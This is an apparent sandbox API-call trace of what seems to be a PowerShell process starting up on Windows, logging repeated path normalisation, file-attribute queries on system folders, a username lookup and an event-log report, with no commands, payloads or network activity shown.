	[0170.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.651] GetLastError () returned 0xcb
	[0170.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce4e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.652] GetLastError () returned 0xcb
	[0170.652] SetErrorMode (uMode=0x1) returned 0x1
	[0170.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2bd02a8 | out: lpFileInformation=0x2bd02a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.652] GetLastError () returned 0xcb
	[0170.652] SetErrorMode (uMode=0x1) returned 0x1
	[0170.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.653] GetLastError () returned 0xcb
	[0170.653] SetErrorMode (uMode=0x1) returned 0x1
	[0170.653] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2bd043c | out: lpFileInformation=0x2bd043c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.653] GetLastError () returned 0xcb
	[0170.653] SetErrorMode (uMode=0x1) returned 0x1
	[0170.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.660] GetLastError () returned 0xcb
	[0170.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.673] GetLastError () returned 0xcb
	[0170.674] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.674] GetLastError () returned 0xcb
	[0170.674] SetErrorMode (uMode=0x1) returned 0x1
	[0170.674] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.674] GetLastError () returned 0xcb
	[0170.674] SetErrorMode (uMode=0x1) returned 0x1
	[0170.674] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.674] GetLastError () returned 0xcb
	[0170.674] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.675] GetLastError () returned 0xcb
	[0170.675] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce5c4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.675] GetLastError () returned 0xcb
	[0170.675] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xce560, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.675] GetLastError () returned 0xcb
	[0170.675] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.675] GetLastError () returned 0xcb
	[0170.675] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.675] GetLastError () returned 0xcb
	[0170.675] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.675] GetLastError () returned 0xcb
	[0170.675] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.675] GetLastError () returned 0xcb
	[0170.675] SetErrorMode (uMode=0x1) returned 0x1
	[0170.675] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.675] GetLastError () returned 0xcb
	[0170.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.676] GetLastError () returned 0xcb
	[0170.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.676] GetLastError () returned 0xcb
	[0170.676] SetErrorMode (uMode=0x1) returned 0x1
	[0170.676] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.676] GetLastError () returned 0xcb
	[0170.676] SetErrorMode (uMode=0x1) returned 0x1
	[0170.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.676] GetLastError () returned 0xcb
	[0170.676] SetErrorMode (uMode=0x1) returned 0x1
	[0170.676] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcea30 | out: lpFileInformation=0xcea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.676] GetLastError () returned 0xcb
	[0170.676] SetErrorMode (uMode=0x1) returned 0x1
	[0170.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.676] GetLastError () returned 0xcb
	[0170.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.676] GetLastError () returned 0xcb
	[0170.677] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.677] GetLastError () returned 0xcb
	[0170.677] SetErrorMode (uMode=0x1) returned 0x1
	[0170.677] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcea3c | out: lpFileInformation=0xcea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.677] GetLastError () returned 0xcb
	[0170.677] SetErrorMode (uMode=0x1) returned 0x1
	[0170.677] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.677] GetLastError () returned 0xcb
	[0170.677] SetErrorMode (uMode=0x1) returned 0x1
	[0170.677] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcea3c | out: lpFileInformation=0xcea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.677] GetLastError () returned 0xcb
	[0170.677] SetErrorMode (uMode=0x1) returned 0x1
	[0170.677] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xce5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.677] GetLastError () returned 0xcb
	[0170.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xce56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.677] GetLastError () returned 0xcb
	[0170.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.677] GetLastError () returned 0xcb
	[0170.677] SetErrorMode (uMode=0x1) returned 0x1
	[0170.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcea3c | out: lpFileInformation=0xcea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.677] GetLastError () returned 0xcb
	[0170.678] SetErrorMode (uMode=0x1) returned 0x1
	[0170.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.678] GetLastError () returned 0xcb
	[0170.678] SetErrorMode (uMode=0x1) returned 0x1
	[0170.678] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcea3c | out: lpFileInformation=0xcea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.678] GetLastError () returned 0xcb
	[0170.678] SetErrorMode (uMode=0x1) returned 0x1
	[0170.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.678] GetLastError () returned 0xcb
	[0170.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xce56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.678] GetLastError () returned 0xcb
	[0170.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xce68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.684] GetLastError () returned 0xcb
	[0170.684] SetErrorMode (uMode=0x1) returned 0x1
	[0170.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2bd81e4 | out: lpFileInformation=0x2bd81e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.684] GetLastError () returned 0xcb
	[0170.684] SetErrorMode (uMode=0x1) returned 0x1
	[0170.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.686] GetLastError () returned 0xcb
	[0170.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.686] GetLastError () returned 0xcb
	[0170.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.686] GetLastError () returned 0xcb
	[0170.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.686] GetLastError () returned 0xcb
	[0171.025] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xcec28 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcec28) returned 0x1
	[0171.148] GetLastError () returned 0xcb
	[0171.148] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xcec30 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcec30) returned 1
	[0171.149] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2bf8bc8*="Available", lpRawData=0x2bf8a84) returned 1
	[0171.163] GetLastError () returned 0x0
	[0171.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.165] GetLastError () returned 0xcb
	[0171.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.166] GetLastError () returned 0xcb
	[0171.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.173] GetLastError () returned 0xcb
	[0171.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.173] GetLastError () returned 0xcb
	[0171.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.173] GetLastError () returned 0xcb
	[0171.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.187] GetLastError () returned 0xcb
	[0171.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.187] GetLastError () returned 0xcb
	[0171.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.188] GetLastError () returned 0xcb
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.189] GetCurrentProcessId () returned 0x864
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.189] GetLastError () returned 0xcb
	[0171.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.190] GetLastError () returned 0xcb
	[0171.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.190] GetLastError () returned 0xcb
